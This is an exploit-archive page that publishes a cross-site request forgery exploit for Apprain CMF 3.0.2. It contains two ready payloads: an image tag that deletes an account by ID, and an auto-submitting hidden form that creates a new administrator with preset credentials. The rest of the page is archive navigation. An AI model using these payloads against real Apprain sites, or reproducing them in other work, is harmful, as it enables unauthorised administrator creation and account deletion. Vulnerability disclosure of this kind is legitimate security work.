Apprain 3.0.2 Cross Site Request Forgery

Apprain 3.0.2 Cross Site Request Forgery: Posted Aug 29, 2013; Authored by Yashar shahinzadeh; Apprain version 3.0.2 suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; MD5 | 0417b5170d123e414fa90d713c7d3e09; Download | Favorite | Comments (0)

Apprain 3.0.2 Cross Site Request Forgery

###################################################################################################################################
# Exploit Title: Apprain CMF / CSRF ADD/DELETE administrator's account
# Date: 2013 29 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://www.apprain.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version :  3.0.2
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################

Summary:
========
1. CSRF - Delete a account
2. CSRF - Adding administrator's account

1. CSRF - Delete a account:
===========================
Deleting account section isn't protected against CSRF attacks, it's a simple get, the following exploit is useful to conduct an attack, albeit [ID] must be replaced by administrator's ID (e.g. 2)

<img src="http://localhost//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">


2. CSRF - Adding administrator's account:
=========================================
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="http://localhost/appRain-v-3.0.2/admin/manage/add" method="post">
                <input type="hidden" name="data[Admin][f_name]" value="yashar">
                <input type="hidden" name="data[Admin][l_name]" value="shahinzadeh">
                <input type="hidden" name="data[Admin][email]" value="y.shahinzadeh@gmail.com">
        <input type="hidden" name="data[Admin][username]" value="yashar">
        <input type="hidden" name="data[Admin][password]" value="Yashar123">
        <input type="hidden" name="data[Admin][status]" value="Active">
        <input type="hidden" name="data[Admin][description]" value="">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>


/** Yasshar shahinzadeh **/

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 50 files
Ubuntu 43 files
Debian 26 files
HP 11 files
Jing Wang 10 files
Mandriva 9 files
Steffen Roesemann 9 files
Benjamin Kunz Mejri 9 files
Denis Andzakovic 7 files
hadji samir 7 files

File Archives

Systems

AIX (386)
Apple (1,212)
BSD (309)
Cisco (1,522)
Debian (4,648)
Fedora (1,665)
FreeBSD (1,113)
Gentoo (2,980)
HPUX (795)
iOS (63)
iPhone (102)
IRIX (219)
Juniper (66)
Linux (26,720)
Mac OS X (527)
Mandriva (2,901)
NetBSD (245)
OpenBSD (428)
RedHat (4,215)
Slackware (595)
Solaris (1,540)
SUSE (1,440)
Ubuntu (4,052)
UNIX (7,515)
UnixWare (157)
Windows (4,537)
Other

Apprain 3.0.2 Cross Site Request Forgery

Apprain 3.0.2 Cross Site Request Forgery

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Apprain 3.0.2 Cross Site Request Forgery

Share This

Apprain 3.0.2 Cross Site Request Forgery

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems